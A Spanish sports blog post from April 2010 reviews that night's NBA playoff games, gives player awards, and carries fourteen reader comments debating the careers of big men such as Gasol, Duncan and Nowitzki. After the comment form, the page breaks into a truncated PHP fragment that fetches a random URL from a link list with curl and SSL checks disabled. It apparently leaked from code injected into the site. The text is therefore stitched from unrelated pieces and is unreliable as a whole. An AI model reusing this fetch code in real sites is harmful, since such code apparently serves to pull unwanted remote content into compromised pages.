Playoffs 22/04/2010: El rugido del trueno azul

23 de April de 2010 por TheDeerHunter

Por fin cayeron los Lakers e inauguraron los Thunder su casillero de victorias. Bien pudo ser de otra forma, pero no se puede negar que se veía venir y que también es justo por los méritos de unos y otros. Ayer cambiaron dos aspectos que inclinaron la balanza del lado local. Por primera vez en la serie Oklahoma dominó el rebote, además de forma clara. Durant aseguró nada menos que 19. Qué jugador tenemos en ciernes, señores. También por primera vez los Thunder pudieron abrir la lata con un lanzamiento de 3 efectivo. Por ahí James Harden tuvo mucho que ver, resurgiendo como la tercera fuerza ofensiva que tanto necesita su equipo. Los Lakers, por su parte, todavía andan esperando un buen partido de Odom, con un Bynum muy intermitente, más la constante falta de contribución de la segunda línea. Westbrook  se salió, siendo posiblemente el más completo de su equipo. Fisher respondió bastante bien, pero por ahí la ventaja la tienen los Thunder. Es un hecho.

Podemos añadir que tan sólo Durant lanzó más tiros libres que todos los amarillos juntos y el equipo enteró les triplicó en este apartado. Cosas de playoffs y muy al gusto del señor Joe Crawford. Con un 12 de 13 desde la línea Durant logró maquillar un pobre 33% en el tiro, muy parecido al de Kobe. Los dos lo están pasando muy mal con las defensas de Artest y Sefolosha. La serie se pone en un 2-1 y lo que te rondaré morena. Está resultando hasta el momento tan igualada como muchos esperábamos. Tiene toda la pinta de que va para largo.

Los Cavs también se dejaron en el camino la imbatibilidad en la serie. Partido sublime de Derrick Rose, provocando que LeBron asuma su marca. Lo aprovechó bien Luol Deng, como también el trabajo de Hinrich defensivamente sobre el elegido. Extraordinario partido también del combo-guard de los Bulls, aunque no lo refleje la monstruosa estadística de su circunstancial par. No podemos tampoco ignorar el esfuerzo de Noah y Brad Miller para igualar el potente juego interior rival. En definitiva, gran trabajo colectivo de los Bulls, como ya lo fue en el segundo partido. En esa línea se están mostrando superiores a los Cavs, aunque claro, sin contar al “bicho” que unos tienen y el resto no.

Finalmente los Suns recuperaron el factor cancha con total facilidad. Los Blazers se marcaron un partido desastroso. La célebre defensa de McMillan supuso encajar 33 puntos por cuarto en la primera parte (y llevaban unos cuantos cuartos seguidos haciendo lo propio, si tenemos en cuenta el partido anterior). En ataque una lástima de equipo, con una terrible incapacidad de cambiar un guión que ha sido fijo hasta estas alturas. Se trata de un equipo inmutable, a veces para lo bueno, pero aquí en playoffs para lo malo. En resumen, al medio tiempo los Suns les doblaban y los asistentes al Rose Garden pudieron deleitarse con toda una mitad de minutos de la basura. Bien empleado el dinero de la entrada. Como mucho, de vez en cuando pudieron salir del tedio con algún que otro rifirrafe motivado por la impotencia local. La actuación de Rudy mejor… de triplista especialista y no saldrá de ese papel en este equipo. Queda mucha serie todavía, pero da toda la sensación que se decidió en el minuto uno del segundo partido.

PREMIOS

MVP: Premio para los 3 mejores jugadores de los equipos ganadores de ayer. Kevin Durant, aparte de anotar 29 puntos y coger 19 rebotes, ahogó a Kobe Bryant obligándole a fallar 19 tiros; Jason Richardson explotó frente a unos Blazers que de repente muestran todas sus carencias con 42 puntos; y Derrick Rose lideró a su equipo con 31 puntos y 7 asistencias en la ¿inesperada? victoria de los Bulls.

Rookie: Taj Gibson sigue de titular en los Bulls aportando su granito de arena. Anoche se fue con 8 puntos y 5 rebotes a dormir. Serge Ibaka también juega sus minutos y aporta (6-6) pero el mejor rookie de la noche fue, sin duda, James Harden que decidió anotar 18 puntos y coger 5 rebotes en el partido probablemente más importante de la temporada. Estas cosas marcan.

Sorpresa: Todos nos podíamos esperar un buen papel de Derrick Rose en estos Playoffs pero la actuación de Kirk Hinrich también está siendo magnífica. Anoche 27 puntos en una excelente serie de 9 de 12 en tiros de campo.

Decepción: Espeluznante aportación del banquillo de los Lakers: quitando a Lamar Odom (que tampoco se salió precisamente) entre Walton, Brown y Farmar aportaron 6 puntos, 2 rebotes y 2 asistencias, eso sí, en 25 míseros minutos. Esto puede pasar factura a los amarillos en rondas posteriores.

Esfuerzo en vano: Ni la increíble actuación de Lebron James (una más) evitó la sorprendente derrota de los Cavs.  39 puntos, 10 rebotes, 8 asistencias, 2 robos y 3 tapones al limbo… Pau Gasol también sufrió algo parecido viendo como sus 17 puntos, 15 rebotes y 6 asistencias no servían para alzarse con la victoria.

Y MAÑANA…

Si Bulls y Thunder han conseguido vencer a los teóricos mejores equipos de los Playoffs, ¿porque no va a poder hacerlo también Miami? En todo caso la atención se centra en las otras 2 eliminatorias que tiene pinta de convertirse en históricas: unos Mavericks con ganas de revancha se van a San Antonio, y los Nuggets visitan el infierno de Salt Lake City.

Comenta

14 comentarios a esta entrada

  1. luigi_sal dice:
    #1

    lo mejor de todo de la serie spurs-mavericks es que, con un poco de suerte, los suns pueden pasar con un 4-1 y llegar descansaditos. si pasan los spurs, como creo, tienen ventaja de campo. ya va siendo hora de vengarse por aquellas eliminatorias, por el triplazo de duncan y el codazo de horry. y luego ya veremos q pasa por el otro lado. bien, thunder, bien, aunq os kiero dejar la pregunta. q sería de este equipo si jeff green aportara los 20pts por partido q yo creo q podría hacer más unos cuantos rebotes y si eric maynor y nick collison aportaran un pelín más que hoy desde el banco…

      Citar

  2. TheDeerHunter dice:
    #2

    ufff… cómo me gustaría una venganza de Nash

      Citar

  3. pcerezo dice:
    #3

    Atención Sres. el Espisodio III de las Guerras de las Galaxias ha llegado. Rose y Durant ya se han unido a Paul y Deron y en dos años son los dueños de la liga.

    – Episodio I: Duncan-Nowitzki-Gasol
    – Episodio II: Wade-Lebron-Bosh
    – Episodio III: Rose, Durant, Deron, Paul.

    Habrá cuarta parte?

    Qué grandes son los PO y qué grande es esta liga….

    Un saludo,
    Pablo

      Citar

  4. Love Denise dice:
    #4

    Nunca entenderé la excesiva jerarquía americana. Si el coach sabe que su estrella está tirandose piedras y el punto de mira está desviado, no será mejor dar protagonismo en ataque a otros jugadores que están haciendo un gran encuentro? (va por kobe y Durant)
    Creo que L.A. debería dar más protagonismo en ataque a sus 3 interiores.

      Citar

  5. Óscar dice:
    #5

    Que no, hombre, que en la NBA no se lleva eso de darle el balón a la estrella y que se las juegue… Eso sólo lo hace McMillan con Brandon Roy. Si es que es un cuadriculao…

      Citar

  6. TheDeerHunter dice:
    #6

    suscribo lo de Love Denise

      Citar

  7. the choosen one dice:
    #7

    pcerezo

    gasol?
    gasol?

    amos no m jodas

      Citar

  8. pcerezo dice:
    #8

    Gasol, por qué no?

      Citar

  9. Viva_Dirk dice:
    #9

    Yo tampoco veo a Gasol a la altura de las carreras NBA de Duncan y Nowitzki, pero no voy a volver a abrir ese debate.

    Y ojo que coincido en que Gasol podria recibir mas balones en esta serie, en los 2 primeros partidos creo que su parte de culpa en ese aspecto es menor que la de sus compañeros. Y Bynum también ha demostrado que puede dominar la serie, empezamos jugando bien con el ayer y luego lo dejamos.

    La paliza que le pegaron los Suns a los Blazers fue un escandalo, desde el primer cuarto.

      Citar

  10. Love Denise dice:
    #10

    Independientemente de los anillos, títulos que tenga cada uno, cosa que depende mucho de tus compañeros, para mí Gasol es mejor jugador que Nowitzki, y Garnett mejor que Duncan. mi clasificación sería KG-Tim-Pau-Dirk, Y ahora mismo indudablemente el mejor es Gasol, que está en un nivel altísimo tras el All-Star, tanto en ataque como en defensa, tanto en la anotación como en el rebote. Si Phil le diese 22 tiros como a Kobe, + los tiros libres que consiguiera sacar, pienso que podría estar en medias cercanas a los 30 puntos por partido.

      Citar

  11. Viva_Dirk dice:
    #11

    Ni Duncan que ha ganado 4 anillos ha tirado nunca esos 22 tiros que tu dices, ni Nowitzki ni practicamente ningun interior de la historia.

    Duncan me parece que esta lejos de cualquier comparación, el mejor con mucho. Yo de los otros me quedo con Nowitzki.

      Citar

  12. tota dice:
    #12

    Buenas, saludos desde la patagonia Argentina.
    Vi el partido de los Bulls y los Cavs, debe ser el 3er o 4to partido que veo de los Cavs en la temporada, veo que tienen un ofensiva como muy estática, a ver si logro explicarme, las jugadas de ataque de los Cavs son: se la dan a Lebron y este define, si lo doblan Lebron pasa al jugador libre y este tira, y la otra jugada pase al poste a Shaq los noto muy predecibles, está bien que con un jugador como Lebron se rompe el esquema, pero me parece que con defensas mas cerradas podrían tener problemas. ¿Uds que opinan?

    Buen partido de los Bulls, los huevos de Noah contagian, hubiera sido una lástima que se les vaya en el ultimo minuto.

    En cuanto al debate de los pf, me parece que nosotros vamos a hablar a nuestros nietos de haber visto un 4 como TD. Los 4 jugadores nombrados TD, KG, DN, y PG son animales, me parece que TD, y KG están un pelín arriba por su defensa, y el caso de Paul creo que Koby lo eclipsa.

    sl2

      Citar

  13. Love Denise dice:
    #13

    Viva Dirk, no me refiero a que Gasol se tire 20 tiros durante toda su carrera, ya sé que eso es casi imposible, pero en momentos puntuales como ahora, donde está a un nivel tremendo y Kobe esta fallón, creo que sí debería de tirarselos.

      Citar

  14. sayim dice:
    #14

    Yo creo sinceramente que Duncan juega en otra categoría, para mi es, detras de Shaq, el jugador más dominante desde la retirada de Jordan. A pesar de que el tiempo no pasa en balde, este año se ha marcado otra brutalidad de temporada. Ayer viendo el Mavs-Spurs con un amigo y ante las sucesivas comparaciones que había entre ambos surgió el comentario de que no fueron mucho mejores los equipos que rodearon a Tim en su carrera que los que rodearon a Dirk. Sin embargo ya se sabe el curriculum de uno y de otro. Yo creo que ofensivamente son dos jugadores buenisimos y de calidad muy pareja (si tuviera que dar un balon decisivo escogeria a Tim) pero creo que no hay color en sus capacidades defensivas e incluso en su capacidad para hacer mejores a sus compañeros…

    Con Garnett pasa un poco parecido. Ha hecho brutalidades de temporadas, pero ha tenido que ir a Boston a ganar su anillo (como una de tres espadas, no como jugador franquicia), que probablemente sera el unico que gane.

    Yo todavía veo la carrera de Gasol un punto por debajo de estos tres monstruos. Sin embargo es el unico de ellos que no da sintomas de haber iniciado la cuesta abajo, para mi a día de hoy está al máximo nivel de juego de su carrera con diferencia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>